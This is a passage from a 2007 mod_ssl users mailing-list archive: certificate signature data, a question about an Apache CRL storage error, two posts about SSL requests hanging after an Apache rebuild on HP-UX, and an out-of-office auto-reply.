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
Af8EAjAAMFYGCWCGSAGG+EIBDQRJFkdUbyBnZXQgeW91ciBvd24gY2VydGlmaWNhdGUgZm9y
IEZSRUUgaGVhZCBvdmVyIHRvIGh0dHA6Ly93d3cuQ0FjZXJ0Lm9yZzBiBgNVHSUEWzBZBggr
BgEFBQcDBAYIKwYBBQUHAwIGCCsGAQUFBwMDBgorBgEEAYI3AgEVBgorBgEEAYI3AgEWBgor
BgEEAYI3CgMEBgorBgEEAYI3CgMDBglghkgBhvhCBAEwMgYIKwYBBQUHAQEEJjAkMCIGCCsG
AQUFBzABhhZodHRwOi8vb2NzcC5jYWNlcnQub3JnMG8GA1UdEQRoMGaBEGFhcm9uQGRhbHRv
bnMuY2GBDmFhcm9uQGZpbmNoLnN0gRlhYXJvbkBzdXBlcmR1cGVyZ2FtZXMub3JngRFhYXJv
bkBmcmVlYnNkLm9yZ4EUYWNkYWx0b25AdWNhbGdhcnkuY2EwDQYJKoZIhvcNAQEFBQADggIB
AABvuxnNMYpbx0t1gLs0vgCewm7MGk0b3CCj/7FcAJFNY8YHNHFcyfrph3dld29S0U1CvHGm
5J8UzsdHycleszUv8jReVRC+jK3qfa0SJCvu8DLt8YN6nrkQv9yK0FCvb8uaCNovbkESvy3Y
XEAfNBefNkZNd4CN9Qhl4UqzVFSrVSHsVmLXaWhfaDGnAJ44YVYky1OvY6NPCsacPiqkvY9C
0r6sYVcdujmj0Khonwg734MNlGxjLICu6gxduub7Y+qC1QH2fzeCnyYDo9H0uN9M7NhYm2mr
1lIwIahrDvtMfCOeTV2ugocCWDHqCXOfExolS80olkVeqwuY9KwQxe7jHivapmUcSfw2R6qW
MQhE6FLzmOqqxDM3EdRbfRcMs9PgzPUx02lVo/ZNdmvF1a7FcArY8ulQ27Zy2laIyu6lfvVJ
yyH/1EeYNnKhtR0lzfdkaNyF+6SGUzDaGdcYgkH0CNQcJMfIXUcTmaodt07hqO2kppHP3284
zKnACN9k/btC+xgrzQAzzj70oKB25okQ2T8cX9evJDFhgG34G0UJY9/HJURY4Ckl60O7GTsN
VllozZV9E04dKjg9N0OqC0OOvgY4mCmcQpmi0QPnjutZzfxtE0C3dti8xC/fq8qFoxkZmXfn
d+9Y5c0Ql4mOzyU+Vogh8xWfMgaE17K8mk8hMIIGEzCCA/ugAwIBAgICLp0wDQYJKoZIhvcN
AQEFBQAwVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cuQ0Fj
ZXJ0Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdDAeFw0wNzA3MDIyMTI4MzNa
Fw0wOTA3MDEyMTI4MzNaMIHNMRowGAYDVQQDExFBYXJvbiBDYXJ5IERhbHRvbjEfMB0GCSqG
SIb3DQEJARYQYWFyb25AZGFsdG9ucy5jYTEdMBsGCSqGSIb3DQEJARYOYWFyb25AZmluY2gu
c3QxKDAmBgkqhkiG9w0BCQEWGWFhcm9uQHN1cGVyZHVwZXJnYW1lcy5vcmcxIDAeBgkqhkiG
9w0BCQEWEWFhcm9uQGZyZWVic2Qub3JnMSMwIQYJKoZIhvcNAQkBFhRhY2RhbHRvbkB1Y2Fs
Z2FyeS5jYTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANAmzV36AYL5p2XYLLlw
jasmxPPYQgD1JwbiROSAypl+HCiadA/uSWDDY26g55+WvtIxiVXSh3KrVu8+NTzSSZ1zeasM
W/+WYWyFp2v6x7dK443kr8ZXL6IsWyUzyjtru4omYieMw2NjKiJJN0vOciinZG9AigLq04GD
6HhQs3UfVSSU9+9+LwCJLHPpulN0IUw1yH2CC+xcBe3R/MRvY0g1XcnX6UJ4ikgjSvL/yO/3
O1lR6G/JqrWbsde2vYG1g1rUDEP6cv3j9eCd3OAaqzeH/jcWYVQ1gO8VoGLpUc2SXHRo8up6
7+81rMkUIY9ypgUpRQPbVdoLfKfJ+hNJqdsCAwEAAaOCAXMwggFvMAwGA1UdEwEB/wQCMAAw
VgYJYIZIAYb4QgENBEkWR1RvIGdldCB5b3VyIG93biBjZXJ0aWZpY2F0ZSBmb3IgRlJFRSBo
ZWFkIG92ZXIgdG8gaHR0cDovL3d3dy5DQWNlcnQub3JnMGIGA1UdJQRbMFkGCCsGAQUFBwME
BggrBgEFBQcDAgYIKwYBBQUHAwMGCisGAQQBgjcCARUGCisGAQQBgjcCARYGCisGAQQBgjcK
AwQGCisGAQQBgjcKAwMGCWCGSAGG+EIEATAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAGG
Fmh0dHA6Ly9vY3NwLmNhY2VydC5vcmcwbwYDVR0RBGgwZoEQYWFyb25AZGFsdG9ucy5jYYEO
YWFyb25AZmluY2guc3SBGWFhcm9uQHN1cGVyZHVwZXJnYW1lcy5vcmeBEWFhcm9uQGZyZWVi
c2Qub3JngRRhY2RhbHRvbkB1Y2FsZ2FyeS5jYTANBgkqhkiG9w0BAQUFAAOCAgEAAG+7Gc0x
ilvHS3WAuzS+AJ7CbswaTRvcIKP/sVwAkU1jxgc0cVzJ+umHd2V3b1LRTUK8cabknxTOx0fJ
yV6zNS/yNF5VEL6Mrep9rRIkK+7wMu3xg3qeuRC/3IrQUK9vy5oI2i9uQRK/LdhcQB80F582
Rk13gI31CGXhSrNUVKtVIexWYtdpaF9oMacAnjhhViTLU69jo08Kxpw+KqS9j0LSvqxhVx26
OaPQqGifCDvfgw2UbGMsgK7qDF265vtj6oLVAfZ/N4KfJgOj0fS430zs2FibaavWUjAhqGsO
+0x8I55NXa6ChwJYMeoJc58TGiVLzSiWRV6rC5j0rBDF7uMeK9qmZRxJ/DZHqpYxCEToUvOY
6qrEMzcR1Ft9Fwyz0+DM9THTaVWj9k12a8XVrsVwCtjy6VDbtnLaVojK7qV+9UnLIf/UR5g2
cqG1HSXN92Ro3IX7pIZTMNoZ1xiCQfQI1Bwkx8hdRxOZqh23TuGo7aSmkc/fbzjMqcAI32T9
u0L7GCvNADPOPvSgoHbmiRDZPxxf168kMWGAbfgbRQlj38clRFjgKSXrQ7sZOw1WWWjNlX0T
Th0qOD03Q6oLQ46+BjiYKZxCmaLRA+eO61nN/G0TQLd22LzEL9+ryoWjGRmZd+d371jlzRCX
iY7PJT5WiCHzFZ8yBoTXsryaTyExggMOMIIDCgIBATBaMFQxFDASBgNVBAoTC0NBY2VydCBJ
bmMuMR4wHAYDVQQLExVodHRwOi8vd3d3LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBD
bGFzcyAzIFJvb3QCAi6dMAkGBSsOAwIaBQCgggGJMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0B
BwEwHAYJKoZIhvcNAQkFMQ8XDTA3MDkwMjIyMTgxMVowIwYJKoZIhvcNAQkEMRYEFFYDT78n
KsCmVFGFGAgkqGSD3L5NMFIGCSqGSIb3DQEJDzFFMEMwCgYIKoZIhvcNAwcwDgYIKoZIhvcN
AwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMCAgEoMGkGCSsGAQQB
gjcQBDFcMFowVDEUMBIGA1UEChMLQ0FjZXJ0IEluYy4xHjAcBgNVBAsTFWh0dHA6Ly93d3cu
Q0FjZXJ0Lm9yZzEcMBoGA1UEAxMTQ0FjZXJ0IENsYXNzIDMgUm9vdAICLp0wawYLKoZIhvcN
AQkQAgsxXKBaMFQxFDASBgNVBAoTC0NBY2VydCBJbmMuMR4wHAYDVQQLExVodHRwOi8vd3d3
LkNBY2VydC5vcmcxHDAaBgNVBAMTE0NBY2VydCBDbGFzcyAzIFJvb3QCAi6dMA0GCSqGSIb3
DQEBAQUABIIBAFaop4Z+iHT/xhNrXHtX2nTcBTyMNN9Wl8KxvgcNf3qb+mosSiEFMxej91q/
LmpIUCg9NhLPL8MeDWOucgCVMcRH3BNyjvKUI7lf6IuymmJ/aadQBy3mY5wdFqHQOM0sEfxs
3tit64K6UMIVfH+S+FNxzGrceEgHTuRIyxQk0K/ArwjFuPGSuduaB4kLRHDK03yR40GTLXOC
1gjdNsdYatWNyJEsi2qRJja3OVKuqC033WxmRxtNYd8vqH5evBw2wpUhpoeRWiKqh5QuzrKp
ii7PoluUipY4+MMfCHR5bCgc77b0PkATcOapcpWkKfj8uHq/jWifqpxqwaGnRp9D6VAAAAAA
AAA=
--------------ms030309060906060501050007--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  3 03:27:57 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 343A714D854; Mon,  3 Sep 2007 03:27:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dg.denmantire.com (pop3.denmantire.com [208.46.112.65])
	by master.modssl.org (Postfix) with ESMTP id BCBB114D82E
	for ; Mon,  3 Sep 2007 03:27:53 +0200 (CEST)
Received: from tim3 (dad.denmantire.com [192.168.42.33])
	by dg.denmantire.com (8.13.8/8.13.1) with ESMTP id l831QaaJ003301
	for ; Sun, 2 Sep 2007 21:26:36 -0400
From: "Tim Boyer" 
To: 
Subject: Unable to configure X.509 CRL storage for certificate revocation
Date: Sun, 2 Sep 2007 21:27:44 -0400
Message-ID: <000001c7edc9$a0fe7ab0$212aa8c0@denmantire.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook 11
Thread-Index: AcftyS1CzC5AD/DpSreOWdgpk3hf/w==
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3138
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tim Boyer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm moving a number of web pages from a RHEL3 server running Apache 2.0.46
to a 
RHEL5 system running 2.2.3. The unsecure pages are running just fine, but if
I 
have ssl.conf in the conf.d directory, httpd won't start up. 
 
The only error message I can find anywhere is in ssl.error_log: 
 
[Sat Sep 01 19:03:26 2007] [error] Unable to configure X.509 CRL storage for
certificate revocation 
 
Googling on that particular string is singularly unhelpful.  

Any nudge in the right direction gratefully appreciated...
 

-- 
Tim Boyer 
Chief Technology Officer
Denman Tire Corporation
tim@denmantire.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  4 21:05:40 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5CC4014D8AD; Tue,  4 Sep 2007 21:05:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from KEXCHANGE.knet.kzoo.edu (kexchange.knet.kzoo.edu [205.234.210.114])
	by master.modssl.org (Postfix) with ESMTP id 59B4614D84A
	for ; Tue,  4 Sep 2007 21:05:37 +0200 (CEST)
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C7EF26.8DFE18E1"
Subject: Apache and mod_ssl
Date: Tue, 4 Sep 2007 15:05:26 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache and mod_ssl
Thread-Index: AcfvJo2nwswguCTkSSaIqmFsok3UJQ==
From: "Aaron Smith" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aaron Smith" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C7EF26.8DFE18E1
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable

                      I have a feeling that I'm missing something
elementary here.  I have an install of apache 2.0.55 with mod_ssl
enabled on a HP-UX system in /opt/apache2.   This one runs fine.  I
recompiled another copy of apache (same version) into /opt/apache2a (for
testing purposes) to add mod_ldap support and that one worked as well.
Then I tried recreating apache2a in apache2 by doing a recompile using a
prefix of apache2 and then doing an install after backing everything up
and moving the old apache install out of the way.  However, this one
DOESN'T work.  If I launch it WITHOUT SSL turned on (i.e, no SSLEngine
on) directive, everything works great.  But as soon as I turn on SSL in
a VirtualHost, then strange things happen.  A client will connect to the
test port via SSL, the SSL negotiation appears to work just fine (tested
using openssl s_client), but when you attempt to do a GET, the request
is sent, but a reply never shows up.  Nothing appears in the access_log,
and child processes begin to spawn with each request.  I can pull up the
server-status url and everytime I hit refresh, one child process goes to
"W" and another one is spawned.  Clicking repeatedly will continue this
process until there are a ton of processes, all stuck at "Waiting" with
0/0/0 under the Acc columntDo it enough, the server's load average
starts to climb.

            I've checked and double checked every permission I can
possible find.  The User and Group directives are both set to "webadmin"
which is the same in all configurations. The permissions of the
sub-directories in both directories match between the two.  I have this
feeling that it's simple with the directory permissions and/or structure
but I just can't seem to locate it.  Anyone have any ideas on what else
I might need to look at?

=20

Aaron

=20

=20

--------------------------------------------------------------------

Aaron Smith                Aaron.Smith@kzoo.edu

System Administrator   (269) 337-7496

Kalamazoo College

=20

=20


------_=_NextPart_001_01C7EF26.8DFE18E1
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable





















         =
            
I have a feeling that I’m missing something elementary here. =
 I have
an install of apache 2.0.55 with mod_ssl enabled on a HP-UX system in
/opt/apache2.   This one runs fine.  I recompiled another =
copy
of apache (same version) into /opt/apache2a (for testing purposes) to =
add
mod_ldap support and that one worked as well.  Then I tried =
recreating
apache2a in apache2 by doing a recompile using a prefix of apache2 and =
then
doing an install after backing everything up and moving the old apache =
install out
of the way.  However, this one DOESN’T work.  If I =
launch it
WITHOUT SSL turned on (i.e, no SSLEngine on) directive, everything works =
great.
 But as soon as I turn on SSL in a VirtualHost, then strange things
happen.  A client will connect to the test port via SSL, the SSL
negotiation appears to work just fine (tested using openssl s_client), =
but when
you attempt to do a GET, the request is sent, but a reply never shows =
up.
 Nothing appears in the access_log, and child processes begin to =
spawn with
each request.  I can pull up the server-status url and everytime I =
hit
refresh, one child process goes to “W” and another one is =
spawned.
 Clicking repeatedly will continue this process until there are a =
ton of
processes, all stuck at “Waiting” with 0/0/0 under the Acc
columntDo it enough, the server’s load average starts to =
climb.



         =
  
I’ve checked and double checked every permission I can possible =
find.
 The User and Group directives are both set to =
“webadmin”
which is the same in all configurations. The permissions of the =
sub-directories
in both directories match between the two.  I have this feeling =
that
it’s simple with the directory permissions and/or structure but I =
just
can’t seem to locate it.  Anyone have any ideas on what else =
I might
need to look at?



 



Aaron



 



 



------------------------------------------------------=
--------------



Aaron =
Smith    &nbs=
p;          
Aaron.Smith@kzoo.edu



System Administrator   (269) =
337-7496



Kalamazoo College<=
/p>


 



 









------_=_NextPart_001_01C7EF26.8DFE18E1--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  4 22:20:30 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D281914D89D; Tue,  4 Sep 2007 22:20:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.144])
	by master.modssl.org (Postfix) with ESMTP id 39EDE14D84A
	for ; Tue,  4 Sep 2007 22:20:25 +0200 (CEST)
Received: from d01relay02.pok.ibm.com (d01relay02.pok.ibm.com [9.56.227.234])
	by e4.ny.us.ibm.com (8.13.8/8.13.8) with ESMTP id l84KKFGD028868
	for ; Tue, 4 Sep 2007 16:20:15 -0400
Received: from d01av02.pok.ibm.com (d01av02.pok.ibm.com [9.56.224.216])
	by d01relay02.pok.ibm.com (8.13.8/8.13.8/NCO v8.5) with ESMTP id l84KKFP4463878
	for ; Tue, 4 Sep 2007 16:20:15 -0400
Received: from d01av02.pok.ibm.com (loopback [127.0.0.1])
	by d01av02.pok.ibm.com (8.12.11.20060308/8.13.3) with ESMTP id l84KKFd2003145
	for ; Tue, 4 Sep 2007 16:20:15 -0400
Received: from d01ml392.pok.ibm.com (d01ml392.pok.ibm.com [9.56.228.50])
	by d01av02.pok.ibm.com (8.12.11.20060308/8.12.11) with ESMTP id l84KKFE7003124
	for ; Tue, 4 Sep 2007 16:20:15 -0400
Subject: Jeff Donald is out of the office.
From: Jeff Donald 
To: modssl-users@modssl.org
Message-ID: 
Date: Tue, 4 Sep 2007 16:20:12 -0400
X-MIMETrack: Serialize by Router on D01ML392/01/M/IBM(Release 7.0.2FP2 IGS702FP2HF2|August
 8, 2007) at 09/04/2007 16:20:14
MIME-Version: 1.0
Content-type: multipart/alternative; 
	Boundary="0__=0ABBF9DFDFFC30228f9e8a93df938690918c0ABBF9DFDFFC3022"
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeff Donald 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0__=0ABBF9DFDFFC30228f9e8a93df938690918c0ABBF9DFDFFC3022
Content-type: text/plain; charset=US-ASCII


I will be out of the office starting  09/03/2007 and will not return until
09/07/2007.


While I'm away please feel free to contact my manager, Nancy Crooks
(ncrooks@us.ibm.com) at 201 967-6428 on any technical issues related to
ITCAM.

For any HR related issue please contact Kathy Dingwall
(kdingwal@ca.ibm.com) at 905-316-3649.

I will respond to your message when I return.

Thank you, and have a great week.
--0__=0ABBF9DFDFFC30228f9e8a93df938690918c0ABBF9DFDFFC3022
Content-type: text/html; charset=US-ASCII
Content-Disposition: inline



I will be out of the office starting  09/03/2007 and will not return until 09/07/2007.





While I'm away please feel free to contact my manager, Nancy Crooks (ncrooks@us.ibm.com) at 201 967-6428 on any technical issues related to ITCAM. 



For any HR related issue please contact Kathy Dingwall (kdingwal@ca.ibm.com) at 905-316-3649.



I will respond to your message when I return.



Thank you, and have a great week.
--0__=0ABBF9DFDFFC30228f9e8a93df938690918c0ABBF9DFDFFC3022--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  4 22:30:24 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AF52914D89D; Tue,  4 Sep 2007 22:30:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from KEXCHANGE.knet.kzoo.edu (kexchange.knet.kzoo.edu [205.234.210.114])
	by master.modssl.org (Postfix) with ESMTP id E7D2214D84A
	for ; Tue,  4 Sep 2007 22:30:23 +0200 (CEST)
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C7EF32.65752815"
Subject: Apache and mod_ssl (extra info)
Date: Tue, 4 Sep 2007 16:30:16 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache and mod_ssl (extra info)
Thread-Index: AcfvMmeYAKLtirEKQgC2AFOth3Hm4w==
From: "Aaron Smith" 
To: 
Cc: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aaron Smith" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C7EF32.65752815
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable

            So I tried something kind of new.  I completely removed the
directory with the non-functioning apache install.  I went back to the
source, did a make clean, a new configure using the same parameters as
before: =20

=20

./configure --prefix=3D/opt/apache3 --enable-auth-dbm=3Dshared
--enable-expires=3Dshared --enable-headers=3Dshared =
--enable-rewrite=3Dshared
--enable-mime-magic=3Dshared --enable-info=3Dshared =
--enable-status=3Dshared
--enable-userdir=3Dshared --enable-http --enable-so =
--enable-ssl=3Dstatic
--with-ssl=3D/opt/openssl098d --with-perl=3D/opt/perl58 --with-ndbm
--enable-ldap=3Dshared --enable-auth_ldap=3Dshared
--with-ldap=3D/usr/local/OpenLDAP.2.3

=20

 Had SHLIB_PATH set to
"/opt/openssl098d/lib:/usr/local/OpenLDAP.2.3/lib"  as well as CPPFLAGS
and LDFLAGS set with -I and -L flags for those two non-standard
directories.  This is all the same as what I had done before.

=20

After the make, make install, I went in to the installed directory and
made as minimal changes as I could.  I changed Listen port in the main
httpd.conf to 8040 and the Listen port (as well as the VirtualHost port)
in ssl.conf to 8045 so it wouldn't step on the toes of the production
apache process.  I then changed the User and Group directives in
httpd.conf to the webadmin user which the other apache process runs as.
Launched this just about plain jane apache using apachectl startssl.
Connecting via http to 8040, everything looks fine.  Connecting via
https to port 8045 shows the behavior of child processing hanging in a
waiting state.

=20

Am I wrong in thinking this is a permissions issue?  Or perhaps
something is funky with the fact that the SSL libraries are in a strange
spot?  I've tried adding the library path to envvars in apache3/bin and
having PassEnv SHLIB_PATH in the httpd.conf.  However, the WORKING
installation is linked to these exact same libraries and although
there's a PassEnv command in it's httpd.conf, nothing was added to
envvars.

=20

If it *is* a permissions issue, what does mod_ssl need permission to get
to in order to function properly?  I notice that the ssl_scache.dir and
ssl_scache.pag files are created in the logs directory, (though the .dir
file is 0 bytes) both owned by webadmin, so that user can at least
CREATE files in that directory.

=20

=20


------_=_NextPart_001_01C7EF32.65752815
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
















         =
   So
I tried something kind of new.  I completely removed the directory =
with
the non-functioning apache install.  I went back to the source, did =
a make
clean, a new configure using the same parameters as before:  =




 



./configure --prefix=3D/opt/apache3 =
--enable-auth-dbm=3Dshared
--enable-expires=3Dshared --enable-headers=3Dshared =
--enable-rewrite=3Dshared
--enable-mime-magic=3Dshared --enable-info=3Dshared =
--enable-status=3Dshared
--enable-userdir=3Dshared --enable-http --enable-so =
--enable-ssl=3Dstatic
--with-ssl=3D/opt/openssl098d --with-perl=3D/opt/perl58 --with-ndbm
--enable-ldap=3Dshared --enable-auth_ldap=3Dshared
--with-ldap=3D/usr/local/OpenLDAP.2.3



 



 Had SHLIB_PATH set to =
“/opt/openssl098d/lib:/usr/local/OpenLDAP.2.3/lib”
 as well as CPPFLAGS and LDFLAGS set with –I and –L =
flags for
those two non-standard directories.  This is all the same as what I =
had
done before.



 



After the make, make install, I went in to the =
installed directory
and made as minimal changes as I could.  I changed Listen port in =
the main
httpd.conf to 8040 and the Listen port (as well as the VirtualHost port) =
in
ssl.conf to 8045 so it wouldn’t step on the toes of the production =
apache
process.  I then changed the User and Group directives in =
httpd.conf to
the webadmin user which the other apache process runs as.  Launched =
this
just about plain jane apache using apachectl startssl.  Connecting =
via
http to 8040, everything looks fine.  Connecting via https to port =
8045
shows the behavior of child processing hanging in a waiting =
state.



 



Am I wrong in thinking this is a permissions issue? =
 Or
perhaps something is funky with the fact that the SSL libraries are in a
strange spot?  I’ve tried adding the library path to envvars =
in apache3/bin
and having PassEnv SHLIB_PATH in the httpd.conf.  However, the =
WORKING
installation is linked to these exact same libraries and although =
there’s
a PassEnv command in it’s httpd.conf, nothing was added to =
envvars.



 



If it *is* a
permissions issue, what does mod_ssl need permission to get to in order =
to
function properly?  I notice that the ssl_scache.dir and =
ssl_scache.pag
files are created in the logs directory, (though the .dir file is 0 =
bytes) both
owned by webadmin, so that user can at least CREATE files in that =
directory.



 



 









------_=_NextPart_001_01C7EF32.65752815--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  5 17:25:20 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3561F14D89A; Wed,  5 Sep 2007 17:25:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from linuxap01e.dmc.de (linuxap01e.dmc.de [193.110.102.5])
	by master.modssl.org (Postfix) with ESMTP id D6CA314D85E
	for ; Wed,  5 Sep 2007 17:25:17 +0200 (CEST)
Received: from [127.0.0.1] (helo=localhost)
